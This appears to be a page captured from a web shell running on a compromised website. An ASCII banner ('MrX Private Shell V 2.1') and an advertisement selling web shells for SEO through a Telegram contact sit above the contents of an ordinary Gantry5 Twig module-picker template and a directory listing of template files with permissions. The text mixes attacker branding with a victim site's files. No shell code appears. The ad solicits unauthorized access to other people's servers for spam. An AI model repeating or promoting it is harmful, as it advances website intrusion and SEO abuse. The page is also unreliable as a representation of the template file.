__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
{# Available variables:
module.[id | title | position | enabled | access]
#}
<div data-mm-particle-stepone="{{ gantry.route('menu/particle') }}" class="menu-editor-extras">
<div class="card settings-block">
<h4>
{{ 'GANTRY5_PLATFORM_PICK_MODULE'|trans }}
</h4>
<div class="inner-params">
<div class="g5-mm-modules-picker menu-editor-modules">
<div class="search settings-block">
<input type="text" placeholder="{{ 'GANTRY5_PLATFORM_SEARCH_ELI'|trans }}" />
<i class="fa fa-search" aria-hidden="true"></i>
</div>
<div class="modules-wrapper">
<ul>
{% for module in gantry.platform.listModules %}
<li data-mm-module="{{ module.id }}" data-mm-type="module">
<span class="module-infos">
<span data-title="{{ (module.enabled ? 'GANTRY5_PLATFORM_PUBLISHED'|trans : 'GANTRY5_PLATFORM_UNPUBLISHED'|trans) ~ ' / ' ~ module.access }}"
data-tip="{{ (module.enabled ? 'GANTRY5_PLATFORM_PUBLISHED'|trans : 'GANTRY5_PLATFORM_UNPUBLISHED'|trans) ~ ' / ' ~ module.access }}"
data-tip-place="top-left"
>
<i class="fa fa-fw fa-{{ module.enabled ? 'toggle-on' : 'toggle-off' }}" aria-hidden="true"></i>
</span>
</span>
<span class="module-wrapper">
<span class="title" data-mm-title="{{ module.title }}" data-mm-filter="{{ module.title }}">
{{ module.title }}
</span>
<span class="sub-title font-small">
<strong>{{ 'GANTRY5_PLATFORM_ID_UPPER'|trans }}</strong>: {{ module.id|default('unknown') }}
</span>
<span class="sub-title font-small" data-mm-filter="{{ module.module|default('none') }}">
<strong>{{ 'GANTRY5_PLATFORM_TYPE'|trans }}</strong>: {{ module.module|default('none') }}
</span>
<span class="sub-title font-small">
<strong>{{ 'GANTRY5_PLATFORM_POSITION'|trans }}</strong>: {{ module.position|default('none') }}
</span>
</span>
</li>
{% endfor %}
</ul>
</div>
</div>
</div>
</div>
<div class="g-modal-actions">
{#<a class="button float-left">{{ 'GANTRY5_PLATFORM_DEFAULTS'|trans }}</a>#}
<button class="button button-primary" type="submit" data-mm-select disabled>{{ 'GANTRY5_PLATFORM_SELECT'|trans }}</button>
<button class="button g5-dialog-close">{{ 'GANTRY5_PLATFORM_CANCEL'|trans }}</button>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| atom-preview.html.twig | File | 1.45 KB | 0775 |
|
| atom.html.twig | File | 3.44 KB | 0775 |
|
| module-picker.html.twig | File | 3.1 KB | 0775 |
|
| particle-picker.html.twig | File | 2.18 KB | 0775 |
|
| particle.html.twig | File | 2.9 KB | 0775 |
|
| widget-picker.html.twig | File | 1.77 KB | 0775 |
|
| widget.html.twig | File | 2.43 KB | 0775 |
|